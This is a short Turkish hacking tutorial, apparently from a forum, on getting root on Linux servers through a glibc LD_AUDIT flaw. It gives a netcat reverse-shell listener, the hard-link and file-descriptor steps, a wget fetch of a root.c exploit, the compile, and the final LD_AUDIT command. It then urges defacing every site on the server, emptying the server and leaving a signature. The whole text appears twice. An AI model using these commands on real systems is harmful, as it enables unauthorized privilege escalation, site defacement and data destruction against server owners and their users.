S.a arkadaşlar yeni bulunan fakat bir çok kişinin bilmediği gnu açığı ile linux sunucuda root olmayı sizlere anlatacağım
Şimdi Backconnect olalım komutumuz başlat>çalıştır>nc -vv -l -p 443
evet şimdi backconnect olduktan sonra komutumuz
mkdir /tmp/vx <<< komutu ile vx dosyamızı oluşturuyoruz
ln /bin/ping /tmp/vx/target <<<< ln ile bin klasoru içerisinden ping çekiyoruz
exec 3< /tmp/vx/target <<< exec ile target ’i çalıştırıyoruz
rm -rf /tmp/vx/ <<< rm ile tmp klasörünün içerisini temizliyoruz...
wget --==[ Host.sk - Your Free Web Hosting Partner ]==-- <<< wget komutu ile root.c exploitinimizi çekiyoruz
gcc -w -fPIC -shared -o /tmp/vx root.c;rm root.c <<< root.c yi düzenliyoruz
LD_AUDIT="\\\\\\\\\\\\\\\\\\$ORIGIN" exec /proc/self/fd/3 <<< ve root oluyoruz
Evet arkadaşlar şimdi ROOT olduk ve root olduktan sonra ne hayal ediyorsanız yapmak elinizde aslında. Önemli olan elinizde exploitiniz var mı yok mu
Exploitiniz varsa bütün sitelere tek bir index basabilirsiniz veya bütün server’ı boşaltabilirsiniz. Asıl önemli olan imzanızı atıp çıkabilirsiniz..
Şimdi Backconnect olalım komutumuz başlat>çalıştır>nc -vv -l -p 443
evet şimdi backconnect olduktan sonra komutumuz
mkdir /tmp/vx <<< komutu ile vx dosyamızı oluşturuyoruz
ln /bin/ping /tmp/vx/target <<<< ln ile bin klasoru içerisinden ping çekiyoruz
exec 3< /tmp/vx/target <<< exec ile target ’i çalıştırıyoruz
rm -rf /tmp/vx/ <<< rm ile tmp klasörünün içerisini temizliyoruz...
wget --==[ Host.sk - Your Free Web Hosting Partner ]==-- <<< wget komutu ile root.c exploitinimizi çekiyoruz
gcc -w -fPIC -shared -o /tmp/vx root.c;rm root.c <<< root.c yi düzenliyoruz
LD_AUDIT="\\\\\\\\\\\\\\\\\\$ORIGIN" exec /proc/self/fd/3 <<< ve root oluyoruz
Evet arkadaşlar şimdi ROOT olduk ve root olduktan sonra ne hayal ediyorsanız yapmak elinizde aslında. Önemli olan elinizde exploitiniz var mı yok mu
Exploitiniz varsa bütün sitelere tek bir index basabilirsiniz veya bütün server’ı boşaltabilirsiniz. Asıl önemli olan imzanızı atıp çıkabilirsiniz..